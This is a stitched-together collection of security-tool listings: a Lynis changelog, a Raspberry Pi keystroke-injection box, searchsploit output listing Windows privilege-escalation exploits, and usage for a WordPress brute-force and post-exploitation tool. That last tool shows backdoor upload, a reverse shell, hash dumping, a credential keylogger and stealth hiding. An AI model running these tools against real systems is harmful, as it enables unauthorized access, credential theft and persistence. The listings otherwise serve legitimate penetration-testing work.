• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis 2.4.7 (2017-03-22)

Changes:
* Minor code cleanups

Tests:
------
* BANN-7126 - Added more words to test for
* CUPS-2308 - Improve logging for CUPS configuration test, removed exception handler
* HTTP-6641 - Support detection for Apache module mod_reqtimeout
* PKGS-7388 - Minor change to detect security repositories

• Raspberry Pi
• Raspberry Pi Radio Hack Box shield (a LCD, some LEDs, and some buttons)
• nRF24LU1+ USB radio dongle with flashed nrf-research-firmware by the Bastille Threat Research Team, e. g.
  • Bitcraze CrazyRadio PA USB dongle
  • Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)
• Python2
• PyUSB

@reboot python2 /home/pi/radiohackbox/radiohackbox.py &

• start/stop recording
• start playback (replay attack)
• start attack (keystroke injection attack)
• start scanning

root@kali:~# searchsploit -h
  Usage: searchsploit [options] term1 [term2] ... [termN]

==========
 Examples
==========
  searchsploit afd windows local
  searchsploit -t oracle windows
  searchsploit -p 39446

=========
 Options
=========
   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe).
   -e, --exact    [Term]      Perform an EXACT match on exploit title (Default is AND) [Implies "-t"].
   -h, --help                 Show this help screen.
   -j, --json     [Term]      Show result in JSON format.
   -m, --mirror   [EDB-ID]    Mirror (aka copies) an exploit to the current working directory.
   -o, --overflow [Term]      Exploit titles are allowed to overflow their columns.
   -p, --path     [EDB-ID]    Show the full path to an exploit (and also copies the path to the clipboard if possible).
   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path).
   -u, --update               Check for and install any exploitdb package updates (deb or git).
   -w, --www      [Term]      Show URLs to Exploit-DB.com rather than the local path.
   -x, --examine  [EDB-ID]    Examine (aka opens) the exploit using $PAGER.
       --colour               Disable colour highlighting in search results.
       --id                   Display the EDB-ID value rather than local path.
       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
                              Use "-v" (verbose) to try even more combinations
=======
 Notes
=======
 * You can use any number of search terms.
 * Search terms are not case-sensitive (by default), and ordering is irrelevant.
   * Use '-c' if you wish to reduce results by case-sensitive searching.
   * And/Or '-e' if you wish to filter results by using an exact match.
 * Use '-t' to exclude the file's path to filter the search results.
   * Remove false positives (especially when searching using numbers - i.e. versions).
 * When updating from git or displaying help, search terms will be ignored.

root@kali:~#
root@kali:~# searchsploit afd windows local
--------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                   |  Path
                                                                                 | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------- ----------------------------------
Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service                  | ./windows/dos/17133.c
Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066) | ./windows/local/6757.txt
Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)            | ./windows/local/18176.py
Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)   | ./windows/local/21844.rb
Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)   | ./win_x86/local/39446.py
Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)            | ./win_x86-64/local/39525.py
Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)              | ./windows/local/40564.c
--------------------------------------------------------------------------------- ----------------------------------
root@kali:~#
root@kali:~# searchsploit -p 39446
Exploit: Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
    URL: https://www.exploit-db.com/exploits/39446/
   Path: /usr/share/exploitdb/platforms/win_x86/local/39446.py

Copied EDB-ID 39446's path to the clipboard.

root@kali:~#

• Brute Force via API, not login form bypassing some forms of protection
• Can automatically upload an interactive shell
• Can be used to spawn a full featured reverse shell
• Dumps WordPress password hashes
• Can backdoor authentication fuction for plaintext password collection
• Inject BeEF hook into all pages
• Pivot to meterpreter if needed

Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/

python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 =(  _____||________|                 ~n00py~

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!
--------------------------
 100% Percent Complete
All correct pairs:
{'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}

 -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>



  -h, --help            show this help message and exit
  -i, --interactive     Interactive command shell
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL of target
  -u USERNAME, --username USERNAME
                        Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -li IP, --ip IP       Listener IP
  -lp PORT, --port PORT
                        Listener Port
  -v, --verbose         Verbose output.
  -e EXISTING, --existing EXISTING
                        Skips uploading a shell, and connects to existing
                        shell

Core Commands
=============

Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page